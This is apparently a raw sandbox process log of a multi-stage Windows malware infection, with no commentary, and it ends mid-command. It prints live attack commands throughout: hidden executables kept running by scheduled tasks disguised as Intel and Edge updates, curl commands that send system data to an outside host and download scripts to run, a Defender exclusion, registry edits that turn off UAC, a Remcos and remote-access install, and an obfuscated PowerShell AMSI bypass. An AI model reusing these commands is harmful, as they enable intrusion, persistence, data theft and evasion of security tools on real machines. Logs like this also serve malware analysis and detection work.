C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\L68Y5XTJ5XBA" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9HVSRQ90HDJM" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp4E57.tmp"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\8Q1DJEUA1N7Q" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UhSGjMbpBvuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$thbOYdsVPKuerv,[Parameter(Position=1)][Type]$xiWsgPPiez)$OhahpFlFSVt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+'l'+''+[Char](101)+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+'a'+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$OhahpFlFSVt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'cial'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+'i'+'d'+'e'+'B'+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$thbOYdsVPKuerv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+',M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$OhahpFlFSVt.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$xiWsgPPiez,$thbOYdsVPKuerv).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OhahpFlFSVt.CreateType();}$WOxBaLpxLBfLh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+'cr'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$BfAwityzpdOGbs=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+'St'+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iJaslFQbTeOIPZJXoVB=UhSGjMbpBvuZ @([String])([IntPtr]);$LaLvjwiczMungKIeROycyh=UhSGjMbpBvuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vbLaEfmoXeu=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+'et'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$mxMpRGzsSpPjGs=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'L'+'oa'+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+'ar'+'y'+''+[Char](65)+'')));$NQviHZiIjlggXytqv=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$aQIeyXT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mxMpRGzsSpPjGs,$iJaslFQbTeOIPZJXoVB).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$oHhmOIkUGmlMaKZmT=$BfAwityzpdOGbs.Invoke($Null,@([Object]$aQIeyXT,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$DBkMMYBztd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,4,[ref]$DBkMMYBztd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oHhmOIkUGmlMaKZmT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,0x20,[ref]$DBkMMYBztd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'r'+''+'u'+'ts'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0f963603-14a6-41ac-a96e-49c513dde3d5}

C:\Windows\system32\lsass.exe

"C:\Windows\system32\lsass.exe"

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XzSGgtVnuRCJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZwPKIPNdDGsxAn,[Parameter(Position=1)][Type]$MZmxauyXBC)$vFZYqoWQnHQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'tedD'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'emo'+'r'+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+','+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'Au'+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$vFZYqoWQnHQ.DefineConstructor('R'+'T'+''+'S'+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$vFZYqoWQnHQ.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'Ne'+'w'+'S'+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$MZmxauyXBC,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $vFZYqoWQnHQ.CreateType();}$DSNlAcZSPOCre=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 